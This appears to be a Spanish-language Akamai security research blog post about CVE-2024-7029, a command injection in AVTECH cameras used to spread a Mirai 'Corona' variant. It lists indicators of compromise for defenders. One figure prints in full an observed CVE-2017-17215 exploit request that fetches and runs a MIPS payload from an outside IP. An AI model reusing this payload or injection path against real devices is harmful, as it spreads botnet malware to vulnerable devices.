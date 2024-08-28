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Preste atención a las vulnerabilidades: la variante Corona de la botnet Mirai se propaga con ataques de día cero

Akamai Wave Blue

escrito por

Kyle Lefton, Larry Cashdollar, y Aline Eliovich

August 28, 2024

Kyle Lefton

escrito por

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Aline Eliovich

escrito por

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

Los ciberdelincuentes aprovechan esta vulnerabilidad para ejecutar código de forma remota en un sistema de destino.
Los ciberdelincuentes aprovechan esta vulnerabilidad para ejecutar código de forma remota en un sistema de destino.

Edición y contribuciones adicionales de Tricia Howard
Editado por Maria Vlasak

Resumen ejecutivo

  • El equipo de respuesta a incidentes e inteligencia en seguridad de Akamai (SIRT) ha identificado una vulnerabilidad de día cero y una campaña de botnets dirigida a otras vulnerabilidades previamente explotadas.

  • CVE-2024-7029 (descubierta por Aline Eliovich) es una vulnerabilidad de inyección de comandos que se encuentra en la función de brillo de las cámaras de circuitos cerrados de televisión (CCTV) AVTECH y que permite ejecutar código de forma remota.

  • Una vez realizada la inyección, la botnet propaga una variante de Mirai con nombres de cadena que hacen referencia al virus COVID-19 y que se remonta a 2020.  

  • Hemos incluido una lista de indicadores de compromiso (IOC) para ayudar en la defensa contra esta amenaza.

Ir a la prueba de concepto

Introducción

El SIRT de Akamai participa en varias fuentes de información internas y externas, así como también las supervisa, para garantizar la seguridad de nuestras operaciones y las de nuestros clientes en Internet. Hemos identificado varias amenazas activas a través de nuestra red global de cebos, incluida esta que comentamos: CVE-2024-7029, descubierta por Aline Eliovich.

Esta vulnerabilidad de día cero para ejecutar código de forma remota (RCE) se ha identificado en la función de brillo de las cámaras IP AVTECH y hace posible la inyección de comandos para propagar Mirai en un sistema de destino. Esto se puede realizar de forma remota con privilegios elevados (propietario del proceso en ejecución). En agosto de 2024, la CISA publicó documentación de asesoramiento del sistema de control industrial (ICS) sobre esta vulnerabilidad. En ella se menciona que el ataque carece de complejidad y se hace referencia a la explotación tanto de forma remota como pública y conocida.

La campaña de botnets se dirige a otras vulnerabilidades y no solo a CVE-2024-7029. Entre otras, se incluyen algunas vulnerabilidades de AVTECH, una RCE en Hadoop YARN, CVE-2014-8361 y CVE-2017-17215. Esto pone de manifiesto la preocupante tendencia de los ciberdelincuentes de atacar vulnerabilidades antiguas, probablemente de baja prioridad, que no cuentan con los parches necesarios para defenderse ante estas amenazas.

No se quede atrás y protéjase

Ahora es el mejor momento de ponerse al día con la aplicación de parches, ya que muchas de estas vulnerabilidades se caracterizan por permitir la RCE. Y lo que es peor, al no poder asignarles una CVE, es más complicado realizar un seguimiento del error y, por tanto, poder aplicar los parches necesarios.

En esta entrada de blog, explicaremos el ataque de día cero y su impacto, e incluiremos una lista completa de indicadores de riesgo (IOC) para facilitar la detección o mitigación.

¿Qué es CVE-2024-7029?

En resumen, CVE-2024-7029 es una vulnerabilidad de las cámaras IP AVTECH en la que el argumento "brillo" en el parámetro "action=" permite la inyección de comandos. El atacante que observamos aprovechó esta vulnerabilidad para propagar una variante de Mirai con nombres de cadena que hacen referencia al virus COVID-19.

¿Desde cuándo ha estado esta campaña activa?

La primera campaña activa que detectamos comenzó el 18 de marzo de 2024, pero, según el análisis, la actividad de esta variante se remonta a diciembre de 2023. La prueba de concepto (PoC) de CVE-2024-7029 está disponible desde, al menos, 2019, pero no se le llegó a asignar una CVE hasta agosto de 2024.

¿A qué afecta?

Esta vulnerabilidad de las cámaras IP AVTECH afecta a las versiones de firmware AVM1203 de FullImg-1023-1007-1011-1009. A pesar de que el modelo en cuestión ha estado descatalogado varios años, la CISA afirmó en su documentación de asesoramiento que estos dispositivos se siguen utilizando en todo el mundo (algunas autoridades de transporte y otras entidades de infraestructura importantes los usan).

¿Cómo funciona?

Descubrimos esta vulnerabilidad al examinar los registros señuelo. En la figura 1 se muestra la URL descodificada para facilitar su comprensión.

Carga descodificada Fig. 1: Cuerpo de carga descodificado de los intentos de ataque

La vulnerabilidad se encuentra en la función de brillo del archivo /cgi-bin/supervisor/Factory.cgi (Figura 2).

La vulnerabilidad se encuentra en la función de brillo Fig. 2: PoC del ataque

¿Qué podría suceder?

Básicamente, esto era lo que sucedía en los ejemplos de explotación que observamos: Los ciberdelincuentes aprovechan esta vulnerabilidad para ejecutar código de forma remota en un sistema de destino.

En la figura 3 se muestra un ejemplo de un atacante que aprovecha este defecto para descargar y ejecutar un archivo JavaScript a fin de recuperar y lanzar su carga de malware principal. Al igual que ocurre con otras muchas botnets, esta también propaga una variante del malware Mirai en sus objetivos.

En la figura 3 se muestra un ejemplo de un atacante que aprovecha este defecto para descargar y ejecutar un archivo JavaScript a fin de recuperar y lanzar su carga de malware principal. Fig. 3: Cadenas del programa de descarga de JavaScript

En este caso, es probable que la botnet esté utilizando la variante Corona Mirai, que otros proveedores llevan relacionando con el virus COVID-19 desde 2020. 

Tras la ejecución, el malware se conecta a un gran número de hosts a través de Telnet en los puertos 23, 2323 y 37215. Además, escribe la cadena "Corona" en la consola de un host infectado (Figura 4).

Además, escribe la cadena "Corona" en la consola de un host infectado (Figura 4).
Además, escribe la cadena "Corona" en la consola de un host infectado (Figura 4). Fig. 4: Ejecución del malware y cómo aparece en la consola

El análisis estático de las cadenas en los ejemplos de malware muestra la orientación de la ruta /ctrlt/DeviceUpgrade_1 en un intento de aprovechar las vulnerabilidades de los dispositivos Huawei afectados por CVE-2017-17215. Los ejemplos cuentan con dos direcciones IP de comando y control integradas, una de las cuales forma parte del código de vulnerabilidad CVE-2017-17215 (Figura 5). 

  POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  <?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Fig. 5: Código de vulnerabilidad CVE-2017-17215 /ctrlt/DeviceUpgrade_1

La botnet también atacó otras vulnerabilidades, como la ejecución de código de forma remota en Hadoop YARN, CVE-2014-8361 y CVE-2017-17215. Hemos observado que estas vulnerabilidades se han explotado en su entorno natural varias veces con éxito.

Conclusión

Una vulnerabilidad a la que no se le haya asignado una CVE sigue siendo una amenaza para su organización; de hecho, podría ser bastante grave. Los ciberdelincuentes que utilizan estas botnets han estado utilizando otras nuevas o de baja prioridad para propagar malware. CVE-2024-7029 es otro ejemplo en el que se utilizan vulnerabilidades de este tipo, y ahora es una tendencia de ataque cada vez más frecuente según el SIRT.

Existen muchas vulnerabilidades que se explotan públicamente o PoC disponibles que carecen de una asignación formal de CVE y, en algunos casos, los dispositivos siguen sin contar con los parches necesarios. Gestionar las prioridades de la aplicación de parches es una tarea ardua, especialmente cuando no hay parches disponibles para algunas de las amenazas. Si no hay forma de hacer frente a una amenaza, se recomienda retirar el hardware y el software para mitigar los riesgos de seguridad y la probabilidad de recibir sanciones legales.

Información actualizada con Akamai

El SIRT de Akamai seguirá detectando y controlando amenazas como CVE-2024-7029, así como informando al respecto, para garantizar la seguridad de nuestros clientes, empleados y la comunidad de seguridad en general. Para estar al día de las novedades, síganos en las redes sociales o consulte nuestra página de investigación de seguridad.

IoC

Direcciones IPv4

93.123.39[.]72

93.123.39[.]87

93.123.39[.]111

147.78.103[.]177

185.216.70[.]37

94.156.8[.]185

93.123.39[.]173

74.50.81[.]158

94.156.71[.]74

93.123.85[.]213

185.216.70[.]142

45.66.231[.]148

185.216.70[.]79

Hashes SHA256

15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b ("r")

c0ae1eb249705f61d45ca747c91c02a411557a28792f4064c1d647abb580bc10 ("x86")

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e82192fbe00bc7205abe786155bbfc0548f5c6ee9819a581e965526674f3cc57 ("mips")

9e9e481bb448438572c2695469c85f773ddcd952025e45bee33bbfce2531c656 ("r")

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3995a7e7eb8eeafb0b6da2c3813e61d11993a820d478c87809136de79d8f8280 ("sh")

40d8f662c187b53fd6fdeb70db9eb262b707e557d3fa4e5e4eacaeaa03ac45f2 ("r")

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cfcae524309a220a48327c50bf32bf5ed3aed5698855b5da9f1ae932fb2df90c ("x86")

774947944ea370592a30478bb3f26081799f7d7df975a6735e620d3442e7803b ("x86")

06b1f09a62204472581e6aec381f96014bb6cc3fc1a9cef38bbcfe88bd82e499 ("r")

4f50d318688c80f08eb7fad6f8788cae459c3420b3b9eb566f936edd7a780ae1 ("sh")

c15bbfb85bfd8305fad8cc0e0d06cbe825e1e6fc6d8dbe5a8d1ac4243bd77d0c ("x86")

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5d58f0fa54784e9c90825cba9e2052f691cdcfe85b0796a6379982832563090d ("x86")
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Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

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Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

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